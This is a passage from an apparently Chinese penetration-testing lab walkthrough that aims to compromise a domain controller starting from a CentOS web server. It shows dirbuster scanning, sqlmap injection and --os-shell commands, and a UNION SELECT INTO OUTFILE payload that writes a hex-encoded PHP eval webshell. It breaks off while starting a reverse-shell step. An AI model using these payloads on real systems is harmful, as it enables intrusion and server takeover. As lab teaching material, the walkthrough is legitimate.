拓扑环境
1.Kali Linux(攻击机)
2.Centos6.4(web服务器)
3.win7(域成员主机无法上网)
4.win2008R2(域控无法上网)
![](https://i-blog.csdnimg.cn/blog_migrate/bc559b31554bf95cdb408d4c4b288b39.jpeg)
目的
通过Kali Linux拿到域控权限
2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我<一
Web渗透
目录扫描
使用dirbuster工具扫描网站根目录 设置kali默认字典文件 /usr/share/wordlists/dirbuster/directorylistlowercase2.3small.txt
![](https://i-blog.csdnimg.cn/blog_migrate/95e97783c7ddaad95dec7cfe8935204f.jpeg)
扫描获得phpinfo.php
![](https://i-blog.csdnimg.cn/blog_migrate/fb78ed5606eaaf843979f1b270810af0.jpeg)
得到网站绝对路径信息
![](https://i-blog.csdnimg.cn/blog_migrate/716cea0adca5cee89b89ba03dc7e8560.jpeg)
SQL查询报错
通过测试发现存在sql整型注入报错情况,进一步获取webshell
![](https://i-blog.csdnimg.cn/blog_migrate/54371b0db5b67541c241b8ae7d6bac52.jpeg)
SQL注入
通过sqlmap测试发现存在sql注入
sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3
![](https://i-blog.csdnimg.cn/blog_migrate/5125faf8cb9d4d8186938f21c0dbaa5c.jpeg)
获取webshell
这里有绝对路径的情况下,可直接写入webshell。这里使用sqlmap osshell的功能
sqlmap(osshell)
#通过sqlmap获取命令执行会话 sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`
![](https://i-blog.csdnimg.cn/blog_migrate/d36979e5fceb4bc496704312450ab02e.jpeg)
直接写webshell(pass)
http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'
反弹shell
为了更好做后续操作,进行反弹shell
获取目标系统信息
os‐shell> uname ‐a os‐shell> whereis python`
![](https://i-blog.csdnimg.cn/blog_migrate/6a0195de48e84f0fe93d94530bb23069.jpeg)
获取meterpreter会话
由于网站上为linux默认安装python,可直接生成python反弹脚本
#生成python反弹脚本 msfv